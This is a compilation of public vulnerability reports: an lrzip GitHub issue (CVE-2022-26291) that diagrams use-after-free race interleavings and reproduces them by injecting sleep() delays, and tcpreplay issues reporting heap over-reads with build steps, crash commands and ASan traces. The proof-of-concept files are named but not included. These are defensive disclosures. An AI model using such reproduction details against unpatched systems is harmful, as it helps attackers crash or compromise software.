----------------------------------------------------------------------------------------------------
	                                    | ...
                                            | if (unlikely(dlen != ucthread->u\_len)) { // UAF here
                                            |     ret = -1;
                                            | } else
                                            |     dealloc(c\_buf);
                                            | out:
                                            |     if (ret == -1) {
                                            |         dealloc(ucthread->s\_buf);
		                            |         ucthread->s\_buf = c\_buf;
	                                    |     }

_Interleaving (b)_

// Thread T0                                | // Thread T1
                                            |
                                            | ...
                                            | if (unlikely(dlen != ucthread->u\_len)) {
                                            |     ret = -1;
                                            | } else
                                            |     dealloc(c\_buf);
                                            | out:
                                            |     if (ret == -1) {
----------------------------------------------------------------------------------------------------
...                                         | 
struct runzip\_node \*node = control->ruhead; | 
struct stream\_info \*sinfo = node->sinfo;    | 
                                            | 
dealloc(sinfo->ucthreads);                  | 
dealloc(sinfo);                             | 
----------------------------------------------------------------------------------------------------
                                            |         dealloc(ucthread->s\_buf);  // UAF occur here
		                            |         ucthread->s\_buf = c\_buf;
	                                    |     }

_Interleaving (c)_

// Thread T0                                | // Thread T1
                                            |
                                            | ...
                                            | if (unlikely(dlen != ucthread->u\_len)) {
                                            |     ret = -1;
                                            | } else
                                            |     dealloc(c\_buf);
                                            | out:
                                            |     if (ret == -1) {
                                            |         dealloc(ucthread->s\_buf); 
----------------------------------------------------------------------------------------------------
...                                         | 
struct runzip\_node \*node = control->ruhead; | 
struct stream\_info \*sinfo = node->sinfo;    | 
                                            | 
dealloc(sinfo->ucthreads);                  | 
dealloc(sinfo);                             | 
----------------------------------------------------------------------------------------------------
		                            |         ucthread->s\_buf = c\_buf; // UAF occur here
	                                    |     }

**Reproduce through delay injection**

To reproduce those use-after-free errors, we can insert two delays (e.g., sleep(1)) into the original source code.

For example, to reproduce interleaving (a) as mentioned earlier, you can insert a delay before dealloc(sinfo->ucthreads); statement in function in steam.c, and also a delay after, as shown as follows.

// In runzip.c, insert a delay after \`dealloc(sinfo->ucthreads);\`
static void clear\_rulist(rzip\_control \*control)
{
	while (control->ruhead) {
		struct runzip\_node \*node = control->ruhead;
		struct stream\_info \*sinfo = node->sinfo;
	
		dealloc(sinfo->ucthreads);
		sleep(1); // delay here !!!!!!!!!!
		dealloc(node->pthreads);
		dealloc(sinfo->s);
		dealloc(sinfo);
		control->ruhead = node->prev;
		dealloc(node);
	}
}

// In steam.c, insert a delay after \`dealloc(sinfo->ucthreads);\`
static int zpaq\_decompress\_buf(rzip\_control \*control \_\_UNUSED\_\_, struct uncomp\_thread \*ucthread, long thread)
{
	...
	zpaq\_decompress(ucthread->s\_buf, &dlen, c\_buf, ucthread->c\_len,
			control->msgout, SHOW\_PROGRESS ? true: false, thread);
	sleep(1); // delay here !!!!!!!!!!
	if (unlikely(dlen != ucthread->u\_len)) {
		print\_err("Inconsistent length after decompression. Got %ld bytes, expected %lld\\n", dlen, ucthread->u\_len);
		ret = -1;
	} else
		dealloc(c\_buf);
    ...
}

compile the program:

CC=gcc CXX=g++ CFLAGS="\-g -O0 -fsanitize=address" CXXFLAGS="\-g -O0 -fsanitize=address" ./configure --enable-static-bin
make

Download the testcase (I upload the POC here, please unzip first).  
POC.zip

Run with the testcase with the following command:

Then, you will see the use-after-free bug report. Here is the trace reported by ASAN:

\=================================================================
==33325==ERROR: AddressSanitizer: heap-use-after-free on address 0x61d0000000e8 at pc 0x000000512b00 bp 0x7f9a30bfdb10 sp 0x7f9a30bfdb08

READ of size 8 at 0x61d0000000e8 thread T3
    #0 0x512aff in zpaq\_decompress\_buf /workdir/lrzip/stream.c:449:6
    #1 0x510381 in ucompthread /workdir/lrzip/stream.c:1554:11
    #2 0x7f9a3541b6da in start\_thread (/lib/x86\_64-linux-gnu/libpthread.so.0+0x76da)
    #3 0x7f9a3479771e in clone (/lib/x86\_64-linux-gnu/libc.so.6+0x12171e)

0x61d0000000e8 is located 104 bytes inside of 2400-byte region \[0x61d000000080,0x61d0000009e0)
freed by thread T0 here:
    #0 0x494e1d in free /home/brian/src/final/llvm-project/compiler-rt/lib/asan/asan\_malloc\_linux.cpp:123:3
    #1 0x4faa0d in clear\_rulist /workdir/lrzip/runzip.c:255:3
    #2 0x4f7ab2 in runzip\_chunk /workdir/lrzip/runzip.c:384:2
    #3 0x4f4aae in runzip\_fd /workdir/lrzip/runzip.c:404:7
    #4 0x4d84ce in decompress\_file /workdir/lrzip/lrzip.c:845:6
    #5 0x4cb98b in main /workdir/lrzip/main.c:706:4
    #6 0x7f9a34697bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)

previously allocated by thread T0 here:
    #0 0x495212 in calloc /home/brian/src/final/llvm-project/compiler-rt/lib/asan/asan\_malloc\_linux.cpp:154:3
    #1 0x5003e1 in open\_stream\_in /workdir/lrzip/stream.c:1084:33
    #2 0x4f6fa5 in runzip\_chunk /workdir/lrzip/runzip.c:322:7
    #3 0x4f4aae in runzip\_fd /workdir/lrzip/runzip.c:404:7
    #4 0x4d84ce in decompress\_file /workdir/lrzip/lrzip.c:845:6
    #5 0x4cb98b in main /workdir/lrzip/main.c:706:4
    #6 0x7f9a34697bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)

Thread T3 created by T0 here:
    #0 0x47fe4a in pthread\_create /home/brian/src/final/llvm-project/compiler-rt/lib/asan/asan\_interceptors.cpp:214:3
    #1 0x4fbbd0 in create\_pthread /workdir/lrzip/stream.c:125:6
    #2 0x507033 in fill\_buffer /workdir/lrzip/stream.c:1713:6
    #3 0x504184 in read\_stream /workdir/lrzip/stream.c:1800:8
    #4 0x4f9c88 in unzip\_literal /workdir/lrzip/runzip.c:162:16
    #5 0x4f731c in runzip\_chunk /workdir/lrzip/runzip.c:338:9
    #6 0x4f4aae in runzip\_fd /workdir/lrzip/runzip.c:404:7
    #7 0x4d84ce in decompress\_file /workdir/lrzip/lrzip.c:845:6
    #8 0x4cb98b in main /workdir/lrzip/main.c:706:4
    #9 0x7f9a34697bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)

SUMMARY: AddressSanitizer: heap-use-after-free /workdir/lrzip/stream.c:449:6 in zpaq\_decompress\_buf
Shadow bytes around the buggy address:
  0x0c3a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0c3a7fff8010: fd fd fd fd fd fd fd fd fd fd fd fd fd\[fd\]fd fd
  0x0c3a7fff8020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a7fff8030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a7fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a7fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a7fff8060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
\==33325\==ABORTING

I'm not sure if these use-after-free bugs could cause serious harm. I hope you can check whether it is necessary to fix these bugs.

Thanks.

CVE-2022-26291: Multiple concurrency UAF bug between `zpaq_decompress_buf()` and `clear_rulist()` function · Issue #206 · ckolivas/lrzip

libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.

'105039?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-27943: Invalid Bug ID

tcpprep in Tcpreplay 4.4.1 has a heap-based buffer over-read in parse_mpls in common/get.c.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
There is a heap-overflow bug found in parse\_mpls, can be triggered via tcpprep+ ASan

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  ./src/tcpprep --auto=bridge --pcap=$POC --cachefile=/dev/null

Output:

    ==2021941==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000142 at pc 0x000000448721 bp 0x7fff4fd006f0 sp 0x7fff4fd006e0
    READ of size 4 at 0x602000000142 thread T0
        #0 0x448720 in parse_mpls (/validate/run1/tcpreplay/tcpprep+0x448720)
        #1 0x44edb0 in parse_metadata (/validate/run1/tcpreplay/tcpprep+0x44edb0)
        #2 0x44c591 in get_l2len_protocol (/validate/run1/tcpreplay/tcpprep+0x44c591)
        #3 0x44fa30 in get_ipv4 (/validate/run1/tcpreplay/tcpprep+0x44fa30)
        #4 0x41434c in process_raw_packets (/validate/run1/tcpreplay/tcpprep+0x41434c)
        #5 0x412708 in main (/validate/run1/tcpreplay/tcpprep+0x412708)
        #6 0x7f6b96777d8f  (/lib/x86_64-linux-gnu/libc.so.6+0x2dd8f)
        #7 0x7f6b96777e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2de3f)
        #8 0x4085f4 in _start (/validate/run1/tcpreplay/tcpprep+0x4085f4)
    
    0x602000000142 is located 2 bytes to the right of 16-byte region [0x602000000130,0x602000000140)
    allocated by thread T0 here:
        #0 0x4dd0d8 in __interceptor_realloc (/validate/run1/tcpreplay/tcpprep+0x4dd0d8)
        #1 0x7f6b969bd1c7  (/lib/x86_64-linux-gnu/libpcap.so.0.8+0x291c7)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/validate/run1/tcpreplay/tcpprep+0x448720) in parse_mpls
    Shadow bytes around the buggy address:
      0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff8000: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
      0x0c047fff8010: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
    =>0x0c047fff8020: fa fa fd fd fa fa 00 00[fa]fa fa fa fa fa fa fa
      0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2021941==ABORTING
    

**System (please complete the following information):**

*   OS: Ubuntu 20.04
*   Clang 12.0.1
*   Tcpreplay Version : latest commit 09f0774

**Credit**  
NCNIPC of China  
Hexhive

**POC**

POC2.zip

CVE-2022-27942: [Bug] heap buffer overflow in parse_mpls · Issue #719 · appneta/tcpreplay

tcprewrite in Tcpreplay 4.4.1 has a heap-based buffer over-read in get_ipv6_next in common/get.c.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
There is a heap-overflow bug found in get\_ipv6\_next, can be triggered via tcprewrite + ASan

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  ./src/tcprewrite -o /dev/null -i POC  
    output:

    Warning: tcprewrite/crash.1 was captured using a snaplen of 64 bytes.  This may mean you have truncated packets.
    =================================================================
    ==7944==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fc3f2e48820 at pc 0x000000535bca bp 0x7ffe1d7fcb70 sp 0x7ffe1d7fcb68
    READ of size 4 at 0x7fc3f2e48820 thread T0
        #0 0x535bc9 in get_ipv6_next /benchmark/vulnerable/tcpreplay/src/common/get.c:679:14
        #1 0x53598e in get_layer4_v6 /benchmark/vulnerable/tcpreplay/src/common/get.c:626:22
        #2 0x4f9bc4 in tcpedit_packet /benchmark/vulnerable/tcpreplay/src/tcpedit/tcpedit.c:198:13
        #3 0x4f80fc in rewrite_packets /benchmark/vulnerable/tcpreplay/src/tcprewrite.c:304:22
        #4 0x4f7418 in main /benchmark/vulnerable/tcpreplay/src/tcprewrite.c:145:9
    
        #5 0x7fc3f175dbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #6 0x41c2c9 in _start (/benchmark/vulnerable/tcpreplay/src/tcprewrite+0x41c2c9)
    
    0x7fc3f2e48820 is located 10 bytes to the right of 262166-byte region [0x7fc3f2e08800,0x7fc3f2e48816)
    allocated by thread T0 here:
        #0 0x4aec90 in malloc /home/nipc/workspace/install/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x536c1f in _our_safe_malloc /benchmark/vulnerable/tcpreplay/src/common/utils.c:50:16
        #2 0x4f7e02 in rewrite_packets /benchmark/vulnerable/tcpreplay/src/tcprewrite.c:267:34
        #3 0x4f7418 in main /benchmark/vulnerable/tcpreplay/src/tcprewrite.c:145:9
        #4 0x7fc3f175dbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /benchmark/vulnerable/tcpreplay/src/common/get.c:679:14 in get_ipv6_next
    Shadow bytes around the buggy address:
      0x0ff8fe5c10b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff8fe5c10c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff8fe5c10d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff8fe5c10e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff8fe5c10f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0ff8fe5c1100: 00 00 06 fa[fa]fa fa fa fa fa fa fa fa fa fa fa
      0x0ff8fe5c1110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff8fe5c1120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff8fe5c1130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff8fe5c1140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff8fe5c1150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==7944==ABORTING
    

**Screenshots**  

**System (please complete the following information):**

*   OS: Ubuntu
*   OS version : can be reproduced in 18.04/20.04
*   clang version: 12.0.1 (release/12.x)
*   Tcpreplay Version : latest commit 09f0774

**Credit**  
Han Zheng  
NCNIPC of China  
Hexhive

**POC**  
POC2.zip

Tag

#c++